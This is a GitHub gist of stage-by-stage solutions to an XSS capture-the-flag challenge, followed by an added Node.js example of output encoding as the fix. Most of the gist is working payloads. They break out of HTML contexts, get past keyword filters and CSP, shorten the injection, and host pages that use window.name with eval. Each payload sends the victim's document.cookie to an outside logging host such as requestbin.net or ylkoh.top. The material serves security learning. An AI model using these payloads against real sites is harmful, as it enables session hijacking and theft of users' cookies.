@Isopach
Last active June 28, 2020 16:44
Thousand Knocks XSS

{} = URL to view requests

Stage 6 /?q=</xmp><img+src=1+onerror=location.href='{}?'+document.cookie>

Stage 7 /?q=%27%20onfocus=location.href=%27{}?%27%2Bdocument.cookie;%20autofocus=%27%27 #Why does it only execute when autofocus is given a value?

Stage 8 /?q=%27onfocus=location.href=%27{}?%27%2Bdocument.cookie;%20autofocus=%27%27

Stage 9 /?q=XSS%20onfocus=location={}?%2bdocument.cookie%20autofocus

Stage 10 /?q=javascript:onerror=location={}?%2bdocument.cookie

Stage 11 /?q=javascript:onerror=location={}?%2bdocument.cookie

Stage 12 ?q=javascript:onerror=top.location={}?%2bdocument.cookie

Stage 13 ?q= //document.cookie, window.sessionStorage and window.localStorage are being censored //their base64 versions, atob('ZG9jdW1lbnQuY29va2ll') etc., are also being censored

Stage 14 #Set document.domain on self to bypass CSP + append payload (parent.document.cookie is important because you want the first URL's cookie) ?q=//8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?document.domain=%27knock.xss.moe%27;top.location.href=%27http://requestbin.net/r/17yvn3e1?%27+encodeURIComponent(parent.document.cookie)

Stage 15 #Add script tag, no CSP ?q=%3Cscript%3Etop.location.href=%27http://requestbin.net/r/17yvn3e1?%27%2Bparent.document.cookie%3C/script%3E

Stage 16 ?q=javascript:top.location.href=%27http://requestbin.net/r/17yvn3e1?%27%2Bparent.document.cookie

Stage 17 ?q=javascript:top.location.href='http://requestbin.net/r/17yvn3e1?'%2Bparent.document.cookie

Stage 18 #Escaping the quotes enclosing the URL didn't work ?q=');top.location.href=http://requestbin.net/r/17yvn3e1?%2Bdocument.cookie//

Stage 19 #alert('Hello',1,alert(0)) <- place the payload so the second alert executes before the first ?q=%27,1,window.open(http://requestbin.net/r/17yvn3e1?%2Bdocument.cookie));//

Stage 20 #<script> tag is being filtered. Use svg onload etc instead. ?q=<svg onload=javascript:location.href=http://requestbin.net/r/17yvn3e1?%2Bdocument.cookie>

Stage 21 Same as Stage 20

Stage 22 #Use a short domain name ?q=%3Csvg%20onload=javascript:location=//ylkoh.top?%2Bdocument.cookie%3E

Stage 23 #Shorter! ?q=%3Csvg onload=location=//ylkoh.top?%2Bdocument.cookie%3E

Stage 24 #Shorter!! (put payload on hosted page) ?q=<svg onload=location=//ylkoh.top/x.html>

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body >

  <img src='#' onerror=window.open('http://ylkoh.top?'%2Bdocument.cookie) />;
</body>
</html>

<script>
name = "location.href='http://ylkoh.top?'+document.cookie";
location.href = "http://1498f071159fd60222c0e7e82b7b6ff046e9e52e.knock.xss.moe/?q=%3Csvg/onload=eval(name)%3E";
</script>

Stage 25 #Host this payload externally and Enter link directly into submission box http://ylkoh.top/x

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body >

  <img src='#' onerror=window.open('http://ylkoh.top?'%2Bdocument.cookie) />;
</body>
</html>

<script>
name = "location.href='http://ylkoh.top?'+document.cookie";
location.href = "http://8e67e39d7e01213d5551c696ef8641b625cc8dd7.knock.xss.moe/?q=%3Csvg/onload=eval(name)%3E";
</script>
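Added example, not part of this gist or of the knock.xss.moe challenge: the output encoding that would have made the reflected q parameter inert in the two contexts the stages above inject into (element content at Stage 6, a quoted attribute at Stages 7-9), plus a decoder showing the encoding is lossless. The page layout (a <pre> and an <input>) is assumed for the example; the two payloads used as input are copied from the Stage 6 and Stage 7 lines above. Plain Node.js, no dependencies.

```javascript
// Added example (not part of the original gist): the server-side fix for the
// reflected `q` parameter that every stage above abuses. Two sinks are covered,
// because the stages hit two different contexts:
//   * element content  (Stage 6 breaks out of <xmp> and opens an <img> tag)
//   * quoted attribute (Stages 7-9 close the value and add onfocus/autofocus)
// Encoding per context makes both injections inert, whereas the keyword
// blacklist described at Stage 13 does not, since the banned tokens never need
// to appear literally in a payload.

// Percent-decode a query value. Stage 6's literal '+' characters are left as
// written here (decodeURIComponent does not treat '+' as a space).
function decodeQueryValue(v) {
  return decodeURIComponent(String(v));
}

// Element-content encoder: the six characters that can change HTML structure.
function encodeForHtmlBody(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Attribute-value encoder: everything that is not alphanumeric becomes a
// numeric entity, so no character can terminate the quoted value or start a
// new attribute.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => `&#x${c.charCodeAt(0).toString(16)};`);
}

// Inverse of both encoders (hex numeric entities plus the named ones used
// above), to show the encoding is lossless: the user still sees exactly what
// they typed, it just cannot be parsed as markup.
function decodeHtmlEntities(s) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"' };
  return String(s).replace(/&(#x([0-9a-fA-F]+)|([a-z]+));/g, (m, _p1, hex, name) =>
    hex !== undefined ? String.fromCharCode(parseInt(hex, 16)) : (named[name] || m));
}

// A safe version of the challenge page (hypothetical layout, assumed for this
// example). The <xmp> of the real Stage 6 page is replaced by <pre>: <xmp> is a
// raw-text element, so entities inside it are displayed literally and a
// user-supplied "</xmp>" can never be encoded away.
function renderSearchPage(q) {
  return '<pre>' + encodeForHtmlBody(q) + '</pre>\n' +
         '<input name="q" value="' + encodeForHtmlAttribute(q) + '">';
}

// True when an encoded fragment contains nothing that could open a tag or
// close a quoted attribute value.
function isInertFragment(encoded) {
  return !/[<>"']/.test(encoded);
}

// Payloads copied from the gist's Stage 6 and Stage 7 lines ('{}' left as the
// gist wrote it); used here only as sample input for the encoders.
const STAGE6_Q = "</xmp><img+src=1+onerror=location.href='{}?'+document.cookie>";
const STAGE7_Q = "%27%20onfocus=location.href=%27{}?%27%2Bdocument.cookie;%20autofocus=%27%27";

// Stand-alone run: print each decoded payload in its encoded, inert form.
for (const raw of [STAGE6_Q, STAGE7_Q]) {
  console.log(renderSearchPage(decodeQueryValue(raw)));
  console.log('---');
}
```

The Stage 13 approach (censoring the string document.cookie) is what these encoders replace: they make it impossible to inject structure instead of trying to enumerate what an injected script may say. Independently of output encoding, an HttpOnly flag on the session cookie would put document.cookie out of reach for every stage listed above.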
Isopach commented Jun 28, 2020

Just made it public as it helped me to learn about XSS a lot
